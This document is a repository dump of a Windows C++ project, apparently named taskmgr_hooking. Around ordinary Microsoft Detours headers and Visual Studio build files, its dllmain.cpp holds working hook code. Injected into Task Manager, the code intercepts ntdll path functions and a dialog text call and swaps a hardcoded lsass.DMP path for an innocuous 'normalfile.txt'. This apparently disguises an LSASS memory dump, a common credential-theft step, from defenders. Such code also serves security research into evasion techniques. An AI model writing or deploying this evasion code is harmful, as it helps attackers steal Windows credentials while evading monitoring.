1210 | _Success_(return != FALSE) 1211 | BOOL WINAPI DetourVirtualProtectSameExecute(_In_ PVOID pAddress, 1212 | _In_ SIZE_T nSize, 1213 | _In_ DWORD dwNewProtect, 1214 | _Out_ PDWORD pdwOldProtect); 1215 | 1216 | // Detours must depend only on kernel32.lib, so we cannot use IsEqualGUID 1217 | BOOL WINAPI DetourAreSameGuid(_In_ REFGUID left, _In_ REFGUID right); 1218 | #ifdef __cplusplus 1219 | } 1220 | #endif // __cplusplus 1221 | 1222 | ////////////////////////////////////////////////////////////////////////////// 1223 | 1224 | #define MM_ALLOCATION_GRANULARITY 0x10000 1225 | 1226 | ////////////////////////////////////////////////////////////////////////////// 1227 | 1228 | #endif // DETOURS_INTERNAL 1229 | #endif // __cplusplus 1230 | 1231 | #endif // _DETOURS_H_ 1232 | // 1233 | //////////////////////////////////////////////////////////////// End of File. 1234 | -------------------------------------------------------------------------------- /taskmgr_hooking/Detours/include/detver.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Common version parameters. 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #define _USING_V110_SDK71_ 1 11 | #include "winver.h" 12 | #if 0 13 | #include 14 | #include 15 | #else 16 | #ifndef DETOURS_STRINGIFY 17 | #define DETOURS_STRINGIFY_(x) #x 18 | #define DETOURS_STRINGIFY(x) DETOURS_STRINGIFY_(x) 19 | #endif 20 | 21 | #define VER_FILEFLAGSMASK 0x3fL 22 | #define VER_FILEFLAGS 0x0L 23 | #define VER_FILEOS 0x00040004L 24 | #define VER_FILETYPE 0x00000002L 25 | #define VER_FILESUBTYPE 0x00000000L 26 | #endif 27 | #define VER_DETOURS_BITS DETOURS_STRINGIFY(DETOURS_BITS) 28 | -------------------------------------------------------------------------------- /taskmgr_hooking/Detours/include/syelog.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (syelog.h of syelog.lib) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | #pragma once 10 | #ifndef _SYELOGD_H_ 11 | #define _SYELOGD_H_ 12 | #include 13 | 14 | #pragma pack(push, 1) 15 | #pragma warning(push) 16 | #pragma warning(disable: 4200) 17 | 18 | ////////////////////////////////////////////////////////////////////////////// 19 | // 20 | // 21 | #define SYELOG_PIPE_NAMEA "\\\\.\\pipe\\syelog" 22 | #define SYELOG_PIPE_NAMEW L"\\\\.\\pipe\\syelog" 23 | #ifdef UNICODE 24 | #define SYELOG_PIPE_NAME SYELOG_PIPE_NAMEW 25 | #else 26 | #define SYELOG_PIPE_NAME SYELOG_PIPE_NAMEA 27 | #endif 28 | 29 | ////////////////////////////////////////////////////////////////////////////// 30 | // 31 | #define SYELOG_MAXIMUM_MESSAGE 4086 // 4096 - sizeof(header stuff) 32 | 33 | typedef struct _SYELOG_MESSAGE 34 | { 35 | USHORT nBytes; 36 | BYTE nFacility; 37 | BYTE nSeverity; 38 | DWORD nProcessId; 39 | FILETIME ftOccurance; 40 | BOOL fTerminate; 41 | CHAR szMessage[SYELOG_MAXIMUM_MESSAGE]; 42 | } SYELOG_MESSAGE, *PSYELOG_MESSAGE; 43 | 44 | 45 | // Facility Codes. 46 | // 47 | #define SYELOG_FACILITY_KERNEL 0x10 // OS Kernel 48 | #define SYELOG_FACILITY_SECURITY 0x20 // OS Security 49 | #define SYELOG_FACILITY_LOGGING 0x30 // OS Logging-internal 50 | #define SYELOG_FACILITY_SERVICE 0x40 // User-mode system daemon 51 | #define SYELOG_FACILITY_APPLICATION 0x50 // User-mode application 52 | #define SYELOG_FACILITY_USER 0x60 // User self-generated. 53 | #define SYELOG_FACILITY_LOCAL0 0x70 // Locally defined. 54 | #define SYELOG_FACILITY_LOCAL1 0x71 // Locally defined. 55 | #define SYELOG_FACILITY_LOCAL2 0x72 // Locally defined. 56 | #define SYELOG_FACILITY_LOCAL3 0x73 // Locally defined. 57 | #define SYELOG_FACILITY_LOCAL4 0x74 // Locally defined. 58 | #define SYELOG_FACILITY_LOCAL5 0x75 // Locally defined. 59 | #define SYELOG_FACILITY_LOCAL6 0x76 // Locally defined. 60 | #define SYELOG_FACILITY_LOCAL7 0x77 // Locally defined. 61 | #define SYELOG_FACILITY_LOCAL8 0x78 // Locally defined. 62 | #define SYELOG_FACILITY_LOCAL9 0x79 // Locally defined. 63 | 64 | // Severity Codes. 65 | // 66 | #define SYELOG_SEVERITY_FATAL 0x00 // System is dead. 67 | #define SYELOG_SEVERITY_ALERT 0x10 // Take action immediately. 68 | #define SYELOG_SEVERITY_CRITICAL 0x20 // Critical condition. 69 | #define SYELOG_SEVERITY_ERROR 0x30 // Error 70 | #define SYELOG_SEVERITY_WARNING 0x40 // Warning 71 | #define SYELOG_SEVERITY_NOTICE 0x50 // Significant condition. 72 | #define SYELOG_SEVERITY_INFORMATION 0x60 // Informational 73 | #define SYELOG_SEVERITY_AUDIT_FAIL 0x66 // Audit Failed 74 | #define SYELOG_SEVERITY_AUDIT_PASS 0x67 // Audit Succeeeded 75 | #define SYELOG_SEVERITY_DEBUG 0x70 // Debugging 76 | 77 | // Logging Functions. 78 | // 79 | VOID SyelogOpen(PCSTR pszIdentifier, BYTE nFacility); 80 | VOID Syelog(BYTE nSeverity, PCSTR pszMsgf, ...); 81 | VOID SyelogV(BYTE nSeverity, PCSTR pszMsgf, va_list args); 82 | VOID SyelogClose(BOOL fTerminate); 83 | 84 | #pragma warning(pop) 85 | #pragma pack(pop) 86 | 87 | #endif // _SYELOGD_H_ 88 | // 89 | ///////////////////////////////////////////////////////////////// End of File. 90 | -------------------------------------------------------------------------------- /taskmgr_hooking/Detours/lib.X64/detours.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/djackreuter/taskmgr_hooking/ce00900c6ad2102621c2f97ea67364e5db3260d9/taskmgr_hooking/Detours/lib.X64/detours.lib -------------------------------------------------------------------------------- /taskmgr_hooking/Detours/lib.X64/detours.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/djackreuter/taskmgr_hooking/ce00900c6ad2102621c2f97ea67364e5db3260d9/taskmgr_hooking/Detours/lib.X64/detours.pdb -------------------------------------------------------------------------------- /taskmgr_hooking/Detours/lib.X64/syelog.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/djackreuter/taskmgr_hooking/ce00900c6ad2102621c2f97ea67364e5db3260d9/taskmgr_hooking/Detours/lib.X64/syelog.lib -------------------------------------------------------------------------------- /taskmgr_hooking/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | typedef struct _RTL_RELATIVE_NAME_U* PRTL_RELATIVE_NAME_U; 9 | 10 | typedef BYTE BOOLEAN, *PBOOLEAN; 11 | 12 | static VOID(NTAPI* Real_RtlInitUnicodeString) (PUNICODE_STRING DestinationString, PCWSTR SourceString) = NULL; 13 | 14 | static NTSTATUS (NTAPI *Real_RtlInitUnicodeStringEx) (UNICODE_STRING* DestinationString, PCWSTR SourceString) = NULL; 15 | 16 | static BOOLEAN (NTAPI *Real_RtlDosPathNameToRelativeNtPathName_U) (PCWSTR DosName, PUNICODE_STRING NtName, PCWSTR* PartName, PRTL_RELATIVE_NAME_U RelativeName) = NULL; 17 | 18 | static NTSTATUS (NTAPI *Real_RtlDosPathNameToRelativeNtPathName_U_WithStatus) (PCWSTR DosFileName, PUNICODE_STRING NtFileName, PCWSTR* FilePath, PRTL_RELATIVE_NAME_U RelativeName, PWSTR* FreeBuffer) = NULL; 19 | 20 | static BOOL(WINAPI *pSetDlgItemTextW) (HWND hDlg, int nIDDlgItem, LPCWSTR lpString) = SetDlgItemTextW; 21 | 22 | PCWSTR newStr = L"C:\\Users\\jhopkins\\AppData\\Local\\Temp\\normalfile.txt"; 23 | PCWSTR matchStr = L"C:\\Users\\jhopkins\\AppData\\Local\\Temp\\lsass.DMP"; 24 | 25 | 26 | static NTSTATUS NTAPI __stdcall hookedRtlDosPathNameToRelativeNtPathName_U_WithStatus (PCWSTR DosFileName, PUNICODE_STRING NtFileName, PCWSTR* FilePath, PRTL_RELATIVE_NAME_U RelativeName, PWSTR* FreeBuffer) 27 | { 28 | if (lstrcmpiW(DosFileName, matchStr) == 0) 29 | { 30 | return Real_RtlDosPathNameToRelativeNtPathName_U_WithStatus(newStr, NtFileName, FilePath, RelativeName, FreeBuffer); 31 | } 32 | return Real_RtlDosPathNameToRelativeNtPathName_U_WithStatus(DosFileName, NtFileName, FilePath, RelativeName, FreeBuffer); 33 | } 34 | 35 | static BOOLEAN NTAPI __stdcall hookedRtlDosPathNameToRelativeNtPathName_U(PCWSTR DosName, PUNICODE_STRING NtName, PCWSTR* PartName, PRTL_RELATIVE_NAME_U RelativeName) 36 | { 37 | if (lstrcmpiW(DosName, matchStr) == 0) 38 | { 39 | return Real_RtlDosPathNameToRelativeNtPathName_U(newStr, NtName, PartName, RelativeName); 40 | } 41 | return Real_RtlDosPathNameToRelativeNtPathName_U(DosName, NtName, PartName, RelativeName); 42 | } 43 | 44 | static VOID NTAPI __stdcall hookedRtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString) 45 | { 46 | if (lstrcmpiW(SourceString, matchStr) == 0) 47 | { 48 | return Real_RtlInitUnicodeString(DestinationString, newStr); 49 | } 50 | return Real_RtlInitUnicodeString(DestinationString, SourceString); 51 | } 52 | 53 | static NTSTATUS NTAPI __stdcall hookedRtlInitUnicodeStringEx(UNICODE_STRING* DestinationString, PCWSTR SourceString) 54 | { 55 | if (lstrcmpiW(SourceString, matchStr) == 0) 56 | { 57 | return Real_RtlInitUnicodeStringEx(DestinationString, newStr); 58 | } 59 | return Real_RtlInitUnicodeStringEx(DestinationString, SourceString); 60 | } 61 | 62 | BOOL hookedSetDlgItemTextW(HWND hDlg, int nIDDlgItem, LPCWSTR lpString) 63 | { 64 | if (lstrcmpiW(lpString, matchStr) == 0) 65 | { 66 | return pSetDlgItemTextW(hDlg, nIDDlgItem, (LPCWSTR)newStr); 67 | } 68 | return TRUE; 69 | } 70 | 71 | BOOL setHooks() 72 | { 73 | DetourRestoreAfterWith(); 74 | 75 | Real_RtlInitUnicodeString = ((VOID (NTAPI *) (PUNICODE_STRING, PCWSTR)) DetourFindFunction("ntdll.dll", "RtlInitUnicodeString")); 76 | Real_RtlInitUnicodeStringEx = ((NTSTATUS (NTAPI *) (UNICODE_STRING*, PCWSTR)) DetourFindFunction("ntdll.dll", "RtlInitUnicodeStringEx")); 77 | Real_RtlDosPathNameToRelativeNtPathName_U = ((BOOLEAN (NTAPI *) (PCWSTR, PUNICODE_STRING, PCWSTR*, PRTL_RELATIVE_NAME_U)) DetourFindFunction("ntdll.dll", "RtlDosPathNameToRelativeNtPathName_U")); 78 | Real_RtlDosPathNameToRelativeNtPathName_U_WithStatus = ((NTSTATUS (NTAPI *) (PCWSTR, PUNICODE_STRING, PCWSTR*, PRTL_RELATIVE_NAME_U, PWSTR*)) DetourFindFunction("ntdll.dll", "RtlDosPathNameToRelativeNtPathName_U_WithStatus")); 79 | 80 | DetourTransactionBegin(); 81 | 82 | DetourUpdateThread(GetCurrentThread()); 83 | 84 | DetourAttach(&(PVOID&) Real_RtlInitUnicodeString, hookedRtlInitUnicodeString); 85 | DetourAttach(&(PVOID&) Real_RtlInitUnicodeStringEx, hookedRtlInitUnicodeStringEx); 86 | DetourAttach(&(PVOID&) Real_RtlDosPathNameToRelativeNtPathName_U, hookedRtlDosPathNameToRelativeNtPathName_U); 87 | DetourAttach(&(PVOID&) Real_RtlDosPathNameToRelativeNtPathName_U_WithStatus, hookedRtlDosPathNameToRelativeNtPathName_U_WithStatus); 88 | DetourAttach(&(PVOID&) pSetDlgItemTextW, hookedSetDlgItemTextW); 89 | 90 | DetourTransactionCommit(); 91 | 92 | return TRUE; 93 | } 94 | 95 | BOOL removeHooks() 96 | { 97 | DetourTransactionBegin(); 98 | 99 | DetourUpdateThread(GetCurrentThread()); 100 | 101 | DetourDetach(&(PVOID&) Real_RtlInitUnicodeString, hookedRtlInitUnicodeString); 102 | DetourDetach(&(PVOID&) Real_RtlInitUnicodeStringEx, hookedRtlInitUnicodeStringEx); 103 | DetourDetach(&(PVOID&) Real_RtlDosPathNameToRelativeNtPathName_U, hookedRtlDosPathNameToRelativeNtPathName_U); 104 | DetourDetach(&(PVOID&) Real_RtlDosPathNameToRelativeNtPathName_U_WithStatus, hookedRtlDosPathNameToRelativeNtPathName_U_WithStatus); 105 | DetourDetach(&(PVOID&) pSetDlgItemTextW, hookedSetDlgItemTextW); 106 | 107 | DetourTransactionCommit(); 108 | 109 | return TRUE; 110 | } 111 | 112 | BOOL APIENTRY DllMain( HMODULE hModule, 113 | DWORD ul_reason_for_call, 114 | LPVOID lpReserved 115 | ) 116 | { 117 | switch (ul_reason_for_call) 118 | { 119 | case DLL_PROCESS_ATTACH: 120 | if (DetourIsHelperProcess()) 121 | { 122 | return TRUE; 123 | } 124 | setHooks(); 125 | break; 126 | case DLL_THREAD_ATTACH: 127 | break; 128 | case DLL_THREAD_DETACH: 129 | break; 130 | case DLL_PROCESS_DETACH: 131 | removeHooks(); 132 | break; 133 | } 134 | return TRUE; 135 | } 136 | 137 | -------------------------------------------------------------------------------- /taskmgr_hooking/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 4 | // Windows Header Files 5 | #include 6 | -------------------------------------------------------------------------------- /taskmgr_hooking/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 6 | -------------------------------------------------------------------------------- /taskmgr_hooking/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | 13 | #endif //PCH_H 14 | -------------------------------------------------------------------------------- /taskmgr_hooking/taskmgr_hooking.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {6e541ba4-6793-4c99-8ef6-42a48f047892} 25 | taskmgrhooking 26 | 10.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;TASKMGRHOOKING_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 90 | true 91 | Use 92 | pch.h 93 | 94 | 95 | Windows 96 | true 97 | false 98 | 99 | 100 | 101 | 102 | Level3 103 | true 104 | true 105 | true 106 | WIN32;NDEBUG;TASKMGRHOOKING_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 107 | true 108 | Use 109 | pch.h 110 | 111 | 112 | Windows 113 | true 114 | true 115 | true 116 | false 117 | 118 | 119 | 120 | 121 | Level3 122 | true 123 | _DEBUG;TASKMGRHOOKING_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 124 | true 125 | Use 126 | pch.h 127 | $(ProjectDir)\Detours\include;%(AdditionalIncludeDirectories) 128 | 129 | 130 | Windows 131 | true 132 | false 133 | $(ProjectDir)\Detours\lib.X64 134 | detours.lib;%(AdditionalDependencies) 135 | 136 | 137 | 138 | 139 | Level3 140 | true 141 | true 142 | true 143 | NDEBUG;TASKMGRHOOKING_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 144 | true 145 | Use 146 | pch.h 147 | $(ProjectDir)\Detours\include;%(AdditionalIncludeDirectories) 148 | 149 | 150 | Windows 151 | true 152 | true 153 | true 154 | false 155 | $(ProjectDir)\Detours\lib.X64 156 | detours.lib;%(AdditionalDependencies) 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | Create 167 | Create 168 | Create 169 | Create 170 | 171 | 172 | 173 | 174 | 175 | -------------------------------------------------------------------------------- /taskmgr_hooking/taskmgr_hooking.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | --------------------------------------------------------------------------------